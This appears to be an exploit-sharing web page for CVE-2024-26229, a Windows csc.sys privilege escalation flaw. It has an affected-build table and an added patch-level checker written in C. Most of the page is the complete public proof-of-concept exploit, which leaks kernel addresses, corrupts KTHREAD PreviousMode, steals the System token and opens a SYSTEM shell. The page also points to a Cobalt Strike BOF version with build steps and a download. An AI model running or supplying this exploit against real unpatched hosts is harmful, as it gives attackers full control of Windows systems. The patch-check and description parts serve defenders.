CVE-2024-26229 Windows CSC privilege escalation vulnerability exploit

Published: 2024-07-18

CVE-2024-26229 vulnerability description

Windows CSC Service Elevation of Privilege Vulnerability.

The flaw is in csc.sys, the Client Side Caching (Offline Files) driver. Its handler for FSCTL code 0x001401a3 is a METHOD_NEITHER control code, so the driver receives the caller's input-buffer pointer unmodified, and it writes through that pointer without checking that it points into user-mode memory (CWE-781, Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code). A local caller who opens the CSC device, which needs no special privilege, can therefore pass a kernel address in place of the input buffer and have the driver write into kernel memory. The public PoC below aims that write at the PreviousMode byte of its own KTHREAD; once PreviousMode reads as KernelMode, NtWriteVirtualMemory no longer validates addresses, and the process overwrites its own EPROCESS token with the System token.

Microsoft's advisory states that an attacker who successfully exploits the vulnerability gains SYSTEM privileges, the highest level of access on a Windows system. It is a local privilege escalation, so the attacker must already be able to run code on the host, but the payoff is what makes CVE-2024-26229 a prime target for malicious actors.

Affected systems

Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems

Detailed list

The build number in the second column is the one shipped by the April 9, 2024 security update for that product; a host on the same build line with a lower revision (the last component) is unpatched.

No.  Build number       Affected system
1    10.0.25398.830     Windows Server 2022, 23H2 Edition (Server Core installation)
2    6.3.9600.21924     Windows Server 2012 R2
3    6.2.9200.24821     Windows Server 2012 (Server Core installation)
4    6.2.9200.24821     Windows Server 2012
5    6.1.7601.27067     Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
6    6.1.7601.27067     Windows Server 2008 R2 for x64-based Systems Service Pack 1
7    6.0.6003.22618     Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
8    6.0.6003.22618     Windows Server 2008 for x64-based Systems Service Pack 2
9    6.0.6003.22618     Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
10   6.0.6003.22618     Windows Server 2008 for 32-bit Systems Service Pack 2
11   10.0.14393.6897    Windows Server 2016 (Server Core installation)
12   10.0.14393.6897    Windows Server 2016
13   10.0.14393.6897    Windows 10 Version 1607 for x64-based Systems
14   10.0.14393.6897    Windows 10 Version 1607 for 32-bit Systems
15   10.0.10240.20596   Windows 10 for x64-based Systems
16   10.0.10240.20596   Windows 10 for 32-bit Systems
17   10.0.22631.3447    Windows 11 Version 23H2 for x64-based Systems
18   10.0.22631.3447    Windows 11 Version 23H2 for ARM64-based Systems
19   10.0.19045.4291    Windows 10 Version 22H2 for 32-bit Systems
20   10.0.19045.4291    Windows 10 Version 22H2 for ARM64-based Systems
21   10.0.19045.4291    Windows 10 Version 22H2 for x64-based Systems
22   10.0.22621.3447    Windows 11 Version 22H2 for x64-based Systems
23   10.0.22621.3447    Windows 11 Version 22H2 for ARM64-based Systems
24   10.0.19044.4291    Windows 10 Version 21H2 for x64-based Systems
25   10.0.19044.4291    Windows 10 Version 21H2 for ARM64-based Systems
26   10.0.19044.4291    Windows 10 Version 21H2 for 32-bit Systems
27   10.0.22000.2899    Windows 11 version 21H2 for ARM64-based Systems
28   10.0.22000.2899    Windows 11 version 21H2 for x64-based Systems
29   6.3.9600.21924     Windows Server 2012 R2 (Server Core installation)
30   10.0.20348.2402    Windows Server 2022 (Server Core installation)
31   10.0.20348.2402    Windows Server 2022
32   10.0.17763.5696    Windows Server 2019 (Server Core installation)
33   10.0.17763.5696    Windows Server 2019
34   10.0.17763.5696    Windows 10 Version 1809 for ARM64-based Systems
35   10.0.17763.5696    Windows 10 Version 1809 for x64-based Systems
36   10.0.17763.5696    Windows 10 Version 1809 for 32-bit Systems
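As an added example, not part of the original page or of either GitHub repository, the following C program turns the table above into a patch-level check that can be run against a build string: it parses either the output of `cmd /c ver` on the host ("Microsoft Windows [Version 10.0.22631.3296]") or a bare "major.minor.build.revision" string, finds the matching build line, and reports whether the revision is at or above the first fixed one. It assumes the fixed builds listed above are cumulative, so any later revision of the same build line carries the fix. A build line that is not in the advisory table (a newer release line, or a pre-Windows 10 host, where `ver` prints only three components) is reported as unknown rather than as patched. The table contents are copied from the list above; the sample inputs at the bottom are constructed.

```c
/* Added example (not from the original PoC): decide from a build string whether a
 * host carries the April 2024 fix for CVE-2024-26229, using the advisory table. */
#include <stdio.h>
#include <string.h>

typedef struct {
    unsigned major, minor, build, ubr;      /* ubr = revision, the 4th component */
} OsVersion;

/* First fixed revision per build line, taken from the detailed list above. */
static const struct {
    unsigned major, minor, build, fixed_ubr;
    const char *name;
} kFixed[] = {
    { 10, 0, 25398, 830,   "Windows Server 2022 23H2 (Server Core)" },
    {  6, 3,  9600, 21924, "Windows Server 2012 R2" },
    {  6, 2,  9200, 24821, "Windows Server 2012" },
    {  6, 1,  7601, 27067, "Windows Server 2008 R2 SP1" },
    {  6, 0,  6003, 22618, "Windows Server 2008 SP2" },
    { 10, 0, 14393, 6897,  "Windows 10 1607 / Windows Server 2016" },
    { 10, 0, 10240, 20596, "Windows 10 1507" },
    { 10, 0, 22631, 3447,  "Windows 11 23H2" },
    { 10, 0, 22621, 3447,  "Windows 11 22H2" },
    { 10, 0, 19045, 4291,  "Windows 10 22H2" },
    { 10, 0, 19044, 4291,  "Windows 10 21H2" },
    { 10, 0, 22000, 2899,  "Windows 11 21H2" },
    { 10, 0, 20348, 2402,  "Windows Server 2022" },
    { 10, 0, 17763, 5696,  "Windows 10 1809 / Windows Server 2019" },
};

typedef enum { PATCH_UNKNOWN_BUILD = -1, PATCH_MISSING = 0, PATCH_PRESENT = 1 } PatchState;

/* Parse "10.0.22631.3296" or "Microsoft Windows [Version 10.0.22631.3296]".
 * Returns 0 on success, -1 if the string does not carry a four-part version. */
int parse_os_version(const char *s, OsVersion *out)
{
    const char *p = strstr(s, "Version ");          /* `ver` output form */
    if (p != NULL)
        s = p + strlen("Version ");
    while (*s != '\0' && (*s < '0' || *s > '9'))     /* skip to the first digit */
        s++;
    if (sscanf(s, "%u.%u.%u.%u", &out->major, &out->minor, &out->build, &out->ubr) != 4)
        return -1;                                   /* e.g. "6.3.9600": no revision */
    return 0;
}

/* Find the build line and compare the revision against the first fixed one.
 * `name` (optional) receives the product line, or NULL when it is not in the table. */
PatchState cve_2024_26229_patch_state(const OsVersion *v, const char **name)
{
    for (size_t i = 0; i < sizeof kFixed / sizeof kFixed[0]; i++) {
        if (kFixed[i].major == v->major && kFixed[i].minor == v->minor &&
            kFixed[i].build == v->build) {
            if (name) *name = kFixed[i].name;
            return v->ubr >= kFixed[i].fixed_ubr ? PATCH_PRESENT : PATCH_MISSING;
        }
    }
    if (name) *name = NULL;
    return PATCH_UNKNOWN_BUILD;                      /* never report unknown lines as safe */
}

/* Whole pipeline on one string; unparseable input counts as unknown. */
PatchState check_build_string(const char *s)
{
    OsVersion v;
    if (parse_os_version(s, &v) != 0)
        return PATCH_UNKNOWN_BUILD;
    return cve_2024_26229_patch_state(&v, NULL);
}

int main(void)
{
    /* Constructed sample inputs. */
    const char *samples[] = {
        "Microsoft Windows [Version 10.0.22631.3296]",  /* the BOF's test target, below the fix */
        "10.0.22631.3447",                              /* first fixed Windows 11 23H2 build */
        "10.0.26100.1",                                 /* build line absent from the table */
        "Microsoft Windows [Version 6.3.9600]",         /* pre-Windows 10 `ver`: no revision */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        OsVersion v;
        const char *name = NULL;
        if (parse_os_version(samples[i], &v) != 0) {
            printf("%-45s -> unparseable (no four-part version)\n", samples[i]);
            continue;
        }
        PatchState st = cve_2024_26229_patch_state(&v, &name);
        printf("%-45s -> %s (%s)\n", samples[i],
               st == PATCH_PRESENT ? "patched" :
               st == PATCH_MISSING ? "VULNERABLE" : "build line not in advisory table",
               name ? name : "unknown line");
    }
    return 0;
}
```

On the host itself the same numbers come from `cmd /c ver`, or from the CurrentBuildNumber and UBR values under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion; on Windows Server 2008 through 2012 R2 `ver` omits the revision, so feed the function the full four-part version from inventory data instead.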

Microsoft advisory

CVE-2024-26229

CVE-2024-26229 PoC / exploit

CVE-2024-26229.c

https://github.com/varwara/CVE-2024-26229

/*
                PoC Info
-------------------------------------------
Vulnerability:    CVE-2024-26229
Environment:      Windows 11 22h2 Build 22621
-------------------------------------------
*/
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

// I use ntdllp.lib private library from VS SDK to avoid GetProcAddress for Nt* functions
// (the public ntdll.lib shipped with the Windows SDK also exports the Nt*/Rtl* routines used here)
#pragma comment(lib, "ntdllp.lib")

#define STATUS_SUCCESS                  ((NTSTATUS)0x00000000L)
#define STATUS_UNSUCCESSFUL             ((NTSTATUS)0xC0000001L)
#define STATUS_INFO_LENGTH_MISMATCH     ((NTSTATUS)0xC0000004L)
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status)              (((NTSTATUS)(Status)) >= 0)
#endif

#define NtCurrentProcess()              ((HANDLE)(LONG_PTR)-1)

//
// Structure offsets for the build named above (Windows 11 22H2, 22621). They differ between
// builds; confirm them in WinDbg (dt nt!_EPROCESS Token, dt nt!_KTHREAD PreviousMode) before
// running on another build, because a wrong offset corrupts kernel memory instead of escalating.
//
#define EPROCESS_TOKEN_OFFSET           0x4B8
#define KTHREAD_PREVIOUS_MODE_OFFSET    0x232
#define CSC_DEV_FCB_XXX_CONTROL_FILE    0x001401a3 // vuln ioctl: METHOD_NEITHER, FILE_ANY_ACCESS

#define SystemHandleInformation         0x10

enum _MODE
{
    KernelMode = 0,
    UserMode = 1
};

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR  ObjectTypeIndex;
    UCHAR  HandleAttributes;
    USHORT HandleValue;
    PVOID  Object;
    ULONG  GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

//
// Not declared in winternl.h; both are exported by ntdll.
//
EXTERN_C NTSTATUS NTAPI NtFsControlFile(
    HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext,
    PIO_STATUS_BLOCK IoStatusBlock, ULONG FsControlCode,
    PVOID InputBuffer, ULONG InputBufferLength, PVOID OutputBuffer, ULONG OutputBufferLength);

EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(
    HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer,
    SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);

//
// Get the kernel object pointer behind a handle of a given process by walking the
// system-wide handle table. SystemHandleInformation returns real kernel pointers to
// medium-integrity callers; low-integrity and sandboxed callers get them zeroed.
//
int32_t GetObjPtr(_Out_ uintptr_t *ppObjAddr, _In_ ULONG ulPid, _In_ HANDLE handle)
{
    int32_t Ret = -1;
    PSYSTEM_HANDLE_INFORMATION pHandleInfo = NULL;
    PSYSTEM_HANDLE_INFORMATION pNew = NULL;
    ULONG ulBytes = 0;
    NTSTATUS Status = STATUS_SUCCESS;

    //
    // Handle heap allocations to overcome STATUS_INFO_LENGTH_MISMATCH: the size the kernel
    // reports is a snapshot and handles keep being created, so keep doubling until it fits.
    //
    while ((Status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, pHandleInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH)
    {
        ulBytes *= 2;
        if (pHandleInfo != NULL)
        {
            pNew = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pHandleInfo, ulBytes);
        }
        else
        {
            pNew = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ulBytes);
        }

        if (pNew == NULL)
        {
            goto done;
        }
        pHandleInfo = pNew;
    }

    if (!NT_SUCCESS(Status))
    {
        Ret = Status;
        goto done;
    }

    for (ULONG i = 0; i < pHandleInfo->NumberOfHandles; i++)
    {
        if ((pHandleInfo->Handles[i].UniqueProcessId == (USHORT)ulPid) &&
            (pHandleInfo->Handles[i].HandleValue == (USHORT)(ULONG_PTR)handle))
        {
            *ppObjAddr = (uintptr_t)pHandleInfo->Handles[i].Object;
            Ret = 0;
            break;
        }
    }

done:
    if (pHandleInfo != NULL)
    {
        HeapFree(GetProcessHeap(), 0, pHandleInfo);
    }
    return Ret;
}

//
// A wrapper to make arbitrary writes to the whole system memory address space.
// It only works while KTHREAD.PreviousMode of the calling thread reads KernelMode:
// NtWriteVirtualMemory then skips the user-address checks on both Dst and Src.
//
NTSTATUS Write64(_In_ uintptr_t Dst, _In_ uintptr_t Src, _In_ size_t Size)
{
    SIZE_T cbNumOfBytesWrite = 0;

    return NtWriteVirtualMemory(NtCurrentProcess(), (PVOID)Dst, (PVOID)Src, Size, &cbNumOfBytesWrite);
}

//
// Leak kernel addresses, flip PreviousMode through the csc.sys bug, steal the System token.
//
NTSTATUS Exploit(void)
{
    UNICODE_STRING    objectName = { 0 };
    OBJECT_ATTRIBUTES objectAttr = { 0 };
    IO_STATUS_BLOCK   iosb = { 0 };
    HANDLE handle = NULL;
    NTSTATUS status = STATUS_SUCCESS;

    //
    // Kernel objects to leak
    //
    uintptr_t Sysproc = 0;
    uintptr_t Curproc = 0;
    uintptr_t Curthread = 0;

    HANDLE hCurproc = NULL;
    HANDLE hThread = NULL;
    int32_t Ret = 0;
    uint8_t mode = UserMode;

    //
    // Open the CSC device through the MUP redirector namespace. The FSCTL code encodes
    // FILE_ANY_ACCESS, so a SYNCHRONIZE-only handle is enough to reach the handler.
    //
    RtlInitUnicodeString(&objectName, L"\\Device\\Mup\\;Csc\\.\\.");
    InitializeObjectAttributes(&objectAttr, &objectName, 0, NULL, NULL);

    status = NtCreateFile(&handle, SYNCHRONIZE, &objectAttr, &iosb, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, FILE_CREATE_TREE_CONNECTION, NULL, 0);
    if (!NT_SUCCESS(status))
    {
        printf("[-] NtCreateFile failed with status = %x\n", status);
        return status;
    }

    //
    // Leak System _EPROCESS kernel address: in the System process (PID 4), handle value 4
    // is a process handle to System itself.
    //
    Ret = GetObjPtr(&Sysproc, 4, (HANDLE)4);
    if (Ret != 0)
    {
        return Ret;
    }
    printf("[+] System EPROCESS address = %llx\n", (unsigned long long)Sysproc);

    //
    // Leak current _KTHREAD kernel address (KTHREAD is the first member of ETHREAD, so the
    // object pointer behind a thread handle is the KTHREAD address)
    //
    hThread = OpenThread(THREAD_QUERY_INFORMATION, TRUE, GetCurrentThreadId());
    if (hThread == NULL)
    {
        printf("[-] OpenThread failed with error = %lu\n", GetLastError());
        return STATUS_UNSUCCESSFUL;
    }
    Ret = GetObjPtr(&Curthread, GetCurrentProcessId(), hThread);
    if (Ret != 0)
    {
        return Ret;
    }
    printf("[+] Current THREAD address = %llx\n", (unsigned long long)Curthread);

    //
    // Leak current _EPROCESS kernel address
    //
    hCurproc = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, GetCurrentProcessId());
    if (hCurproc == NULL)
    {
        printf("[-] OpenProcess failed with error = %lu\n", GetLastError());
        return STATUS_UNSUCCESSFUL;
    }
    Ret = GetObjPtr(&Curproc, GetCurrentProcessId(), hCurproc);
    if (Ret != 0)
    {
        return Ret;
    }
    printf("[+] Current EPROCESS address = %llx\n", (unsigned long long)Curproc);

    //
    // Sending the payload to the csc.sys driver to trigger the bug. The FSCTL is METHOD_NEITHER,
    // so the driver gets this pointer raw and writes through it without checking that it is a
    // user-mode address. Aiming it 0x18 bytes before PreviousMode puts the driver's write over
    // KTHREAD.PreviousMode, which ends up 0 (KernelMode).
    //
    status = NtFsControlFile(handle, NULL, NULL, NULL, &iosb, CSC_DEV_FCB_XXX_CONTROL_FILE,
                             /*Vuln arg*/ (PVOID)(Curthread + KTHREAD_PREVIOUS_MODE_OFFSET - 0x18), 0, NULL, 0);
    if (!NT_SUCCESS(status))
    {
        printf("[-] NtFsControlFile failed with status = %x\n", status);
        return status;
    }

    printf("[!] Leveraging DKOM to achieve LPE\n");
    printf("[!] Calling Write64 wrapper to overwrite current EPROCESS->Token\n");

    //
    // Token stealing: copy the System process's EPROCESS.Token (an EX_FAST_REF, so the
    // low reference-count bits come along) over our own.
    //
    status = Write64(Curproc + EPROCESS_TOKEN_OFFSET, Sysproc + EPROCESS_TOKEN_OFFSET, sizeof(uintptr_t));
    if (!NT_SUCCESS(status))
    {
        printf("[-] Token overwrite failed with status = %x\n", status);
    }

    //
    // Restoring KTHREAD->PreviousMode, otherwise every later system call from this thread keeps
    // running with the kernel-mode argument checks disabled.
    //
    Write64(Curthread + KTHREAD_PREVIOUS_MODE_OFFSET, (uintptr_t)&mode, sizeof(mode));

    CloseHandle(hCurproc);
    CloseHandle(hThread);
    CloseHandle(handle);

    //
    // spawn the shell with "nt authority\system"
    //
    system("cmd.exe");

    return status;
}


int main(void)
{
    NTSTATUS status = Exploit();

    return status;
}


CVE-2024-26229 BOF

NVISO's Beacon Object File (BOF) implementation of CVE-2024-26229 for Cobalt Strike and BruteRatel.

https://github.com/NVISOsecurity/CVE-2024-26229-BOF

Build command

gcc -c CVE-2024-26229-bof.c -o CVE-2024-26229-bof.o

A BOF is loaded as a COFF object, so when building on Linux use the MinGW cross compiler (x86_64-w64-mingw32-gcc) in place of gcc.


The vulnerability was fixed on April 9, 2024; see CVE-2024-26229 for details.

The software is provided as is. No further updates should be expected.

Testing

Tested on Windows 11 23H2 build 22631.3296; privilege escalation succeeded. That build is below the fixed build 10.0.22631.3447 listed for Windows 11 23H2 above.


Credits

All rights to the exploit code belong to its original author, varwara.

Download

CVE-2024-26229-BOF.zip
